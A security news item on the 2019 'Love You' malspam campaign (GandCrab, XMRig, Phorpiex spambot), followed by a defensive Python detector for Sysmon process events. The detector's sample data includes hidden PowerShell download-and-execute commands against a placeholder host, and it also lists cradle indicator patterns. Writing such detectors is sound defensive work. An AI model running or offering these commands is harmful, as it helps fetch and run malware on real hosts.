“Love You” Spam Campaign Distributes Malware Cocktail

Delaware, USA – January 15, 2019 – Although Valentine's Day is still a month away, adversaries are already sending spam emails with unexpected content. Security researcher Brad Duncan published his findings on a campaign spreading a bundle of ransomware, a cryptocurrency miner and a spambot. The first attacks of the “Love You” campaign, carried by the Phorpiex botnet, were spotted at the end of November 2018. The campaign got its name from the attached zip archive, whose name starts with ‘Love_You_,’ and from the ‘love-themed’ email subjects, which change with each new wave of malspam. The archive contains a JavaScript file, which runs a PowerShell command to download and execute a malicious file. That executable in turn downloads and installs GandCrab ransomware, XMRig and the Phorpiex spambot. In addition, the malware infects attached USB flash drives to spread to as many systems as possible.

The “Love You” campaign is not particularly sophisticated, but it is still very dangerous, since the installed cocktail lets adversaries infect new systems effectively and profit from successfully attacked machines. Adversaries often use obfuscated PowerShell commands to deliver the final payload because obfuscation helps bypass signature-based antivirus solutions. To monitor the execution of PowerShell commands on Windows hosts you can use the Sysmon Framework rule pack, which visualizes multiple security checks on Sysmon's events and notifies you about suspicious activity. You can also use the rules from Threat Detection Marketplace to detect the latest version of GandCrab ransomware: https://tdm.socprime.com/tdm/info/1356/
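The two detection opportunities the article describes are the mail attachment itself (a zip whose name starts with ‘Love_You_’ and that carries a script file) and the process chain on the host (a Windows script host launching PowerShell with a download-and-execute or encoded command, which is what Sysmon process-creation events expose). The following Python is an added example written for this page, not code from the article, from Brad Duncan, or from the Sysmon Framework rule pack. The event field names (`image`, `parent_image`, `command_line`) mirror Sysmon Event ID 1 fields but are a simplified in-memory form, the indicator list is an assumed set of generic cradle fragments, and all sample events and attachment names are constructed for the demonstration.

```python
import base64
import re
from dataclasses import dataclass, field

# Script hosts that a malicious .js from a zip attachment would run under.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Script extensions worth flagging inside a mail attachment archive (assumed list).
SCRIPT_EXTENSIONS = (".js", ".jse", ".wsf", ".vbs", ".vbe", ".ps1")
# Command-line fragments typical of download-and-execute cradles (assumed
# indicator list for illustration, not the campaign's actual command lines).
CRADLE_PATTERNS = [
    r"downloadfile", r"downloadstring", r"invoke-webrequest", r"\biwr\b",
    r"new-object\s+net\.webclient", r"start-process", r"\biex\b",
    r"invoke-expression", r"-windowstyle\s+hidden", r"-w\s+hidden",
    r"executionpolicy\s+bypass", r"-ep\s+bypass",
]
# PowerShell accepts abbreviated forms of -EncodedCommand; capture the base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class Event:
    """Simplified Sysmon Event ID 1 (process creation) record."""
    utc_time: str
    image: str
    parent_image: str
    command_line: str


@dataclass
class Finding:
    utc_time: str
    reasons: list = field(default_factory=list)
    decoded: str = ""  # plaintext of an -EncodedCommand payload, if any


def suspicious_attachment(archive_name, member_names):
    """Mail-gateway check: 'Love_You_*' zip that carries a script file."""
    if not archive_name.lower().startswith("love_you_"):
        return False
    return any(m.lower().endswith(SCRIPT_EXTENSIONS) for m in member_names)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or '' if absent/invalid."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event):
    """Score one process-creation event; None means nothing suspicious."""
    image, parent = basename(event.image), basename(event.parent_image)
    if image not in POWERSHELL:
        return None
    reasons = []
    if parent in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    decoded = decode_encoded_command(event.command_line)
    if decoded:
        reasons.append("encoded PowerShell command")
    # Match indicators against both the raw and the decoded command text.
    text = (event.command_line + " " + decoded).lower()
    reasons.extend(f"cradle indicator: {p}" for p in CRADLE_PATTERNS if re.search(p, text))
    return Finding(event.utc_time, reasons, decoded) if reasons else None


def scan(events):
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed sample events: one benign admin script, one script-host cradle,
# one encoded command. URLs use the reserved example.invalid domain.
_ENCODED = base64.b64encode(
    "Invoke-WebRequest http://example.invalid/a -OutFile a.exe".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    Event("2019-01-15 08:00:01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe", r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    Event("2019-01-15 08:02:17", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\wscript.exe",
          "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
          ".DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe');"
          " Start-Process 'C:\\Users\\Public\\x.exe'\""),
    Event("2019-01-15 08:03:40", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\cmd.exe", f"powershell.exe -enc {_ENCODED}"),
]

if __name__ == "__main__":
    print("attachment flagged:", suspicious_attachment("Love_You_2019.zip", ["Love_You_2019.js"]))
    for finding in scan(SAMPLE_EVENTS):
        print(finding.utc_time, "|", "; ".join(finding.reasons))
```

In production the same logic would read Sysmon Event ID 1 records from the `Microsoft-Windows-Sysmon/Operational` channel (or the SIEM they are forwarded to) instead of the constructed list; the benign backup script produces no finding, while the script-host child and the encoded command each produce one, with the decoded plaintext kept on the finding for analyst review.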